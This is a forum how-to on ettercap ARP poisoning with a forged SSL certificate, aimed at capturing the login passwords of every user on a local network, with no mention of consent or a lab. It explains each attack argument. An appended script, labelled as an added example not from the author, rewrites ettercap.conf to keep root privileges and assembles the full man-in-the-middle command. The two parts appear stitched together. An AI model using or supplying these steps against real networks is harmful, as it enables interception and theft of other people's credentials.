
For people with Ettercap/SSL trouble.

Hey everyone,

I spent a lot of time trying to get ettercap to sniff SSL passwords using ARP poisoning and sending a forged certificate to the victim machine. I saw a lot of posts very similar to my problem on here without actually finding the solution, so I'm posting what I figured out last night.

For me the problem was very simple. ettercap doesn't seem to do port forwarding for the machine that it is running on. Yes, that's what I messed up. I ran ettercap with all the proper arguments and then FTP'd to some place, and saw the password. "Great!" I thought, and then I tried GMail and it was silent, it didn't show anything. This is a sign of SSL not being forwarded or that you didn't edit /etc/ettercap.conf properly (see below).

I didn't realize that to test this I should grab another machine. I thought the machine I was on was fine. A lot of searching and asking in IRC and this didn't come up so I figured it should be posted to here.

Here's exactly what I did for your benefit:

Step 1) Edit /etc/ettercap.conf

Step 1a) Set the following lines to zero instead of 65536
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default

Note: You only have to perform step 1 once on a machine, then run the command whenever.

Explanation of arguments:
--text: puts ettercap in text-only, no interactive UI mode
--quiet: suppresses output of all the packets being sniffed, limits output to only passwords
--iface eth1: This is the LAN interface you're using; eth1 happens to be my wireless card.
--plugin autoadd: Very useful plugin. This will poison machines that connect after you have started the script. If you don't do this, you only poison the machines that are on when you begin, which might be no one.
--log-info mylog: Logs just connection details and passwords. See manpage if you want more logging. This will create a file called log.eci which can be read later with etterlog.
--mitm arp:remote: Tells ettercap to poison the ARP tables so that everyone on the network thinks that you're the gateway and all communication will go through you.
// //: These are two lists of IP, port ranges to sniff. Read the man page on this for more details. As I have set it up, it will poison and sniff everyone on the network.

Details of what will happen:
After you run the command, anyone on the network visiting an SSL page (that is anything with https rather than http) is going to see a new certificate and get a very non-subtle warning that there's possibly foul play afoot (assuming they have visited the site before and have a valid certificate stored already). If they accept the new certificate and log in, their password will be printed to your console.
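The two steps above (the ec_uid/ec_gid edit in /etc/ettercap.conf, then the ettercap invocation whose arguments are explained one by one) as a single script. This is an added example, not code from the post's author: it rewrites the two privilege lines to 0 without touching the rest of the file, reads them back so you can confirm the edit took, and assembles the command line from the arguments the post lists. The conf path /etc/ettercap.conf, the interface eth1 and the log name mylog are assumptions taken from the post; change them for your box. The script deliberately only prints the ettercap command rather than executing it, because the post's own lesson is that you must run it against a different machine than the one ettercap sits on, and the example cannot know which machine that is.

```shell
#!/usr/bin/env bash
# Added example (not from the original forum post). Applies the ettercap.conf
# privilege edit and builds the ettercap command the post's argument list
# describes. Paths, interface and log name are assumptions; adjust as needed.
set -eu

# Step 1a: force ec_uid / ec_gid to 0 so ettercap keeps root privileges.
# Matches whatever number is there (the post says 65536, stock files may
# differ) and leaves the trailing "# nobody is the default" comment intact.
# Works on a temp copy and moves it back, so it runs the same on GNU and BSD sed.
set_ettercap_privs() {
  local conf="$1" tmp
  tmp="$(mktemp)"
  sed -E \
    -e 's/^([[:space:]]*ec_uid[[:space:]]*=[[:space:]]*)[0-9]+/\10/' \
    -e 's/^([[:space:]]*ec_gid[[:space:]]*=[[:space:]]*)[0-9]+/\10/' \
    "$conf" > "$tmp"
  mv "$tmp" "$conf"
}

# Read back the numeric value of a key (ec_uid or ec_gid), comments stripped,
# so the edit can be verified instead of assumed.
conf_value() {
  local conf="$1" key="$2"
  sed -n -E "s/^[[:space:]]*${key}[[:space:]]*=[[:space:]]*([0-9]+).*/\1/p" "$conf"
}

# Step 2: the command line from the post's "Explanation of arguments":
#   --text           text-only UI         --quiet           passwords only
#   --iface <if>     LAN interface        --plugin autoadd  poison late joiners
#   --log-info <f>   connection/pw log    --mitm arp:remote ARP-poison everyone
#   // //            empty TARGET1/TARGET2 = whole subnet
ettercap_cmd() {
  local iface="$1" log="$2"
  printf '%s' "ettercap --text --quiet --iface ${iface} --plugin autoadd --log-info ${log} --mitm arp:remote // //"
}

# Usage: sudo ./ettercap-ssl.sh --apply [/etc/ettercap.conf] [eth1] [mylog]
# Nothing runs when the file is merely sourced.
if [ "${1:-}" = "--apply" ]; then
  conf="${2:-/etc/ettercap.conf}"   # assumed path, per the post
  iface="${3:-eth1}"                # assumed interface, per the post
  log="${4:-mylog}"                 # assumed log name, per the post
  set_ettercap_privs "$conf"
  echo "ec_uid=$(conf_value "$conf" ec_uid) ec_gid=$(conf_value "$conf" ec_gid)"
  echo "Now run the following, and test from a DIFFERENT machine than this one:"
  ettercap_cmd "$iface" "$log"
  echo
fi
```

Run it once with --apply (step 1 only needs doing once per machine, as the post says), check that both values print as 0, then paste the printed command into a root shell and browse to an https site from a second host on the same LAN.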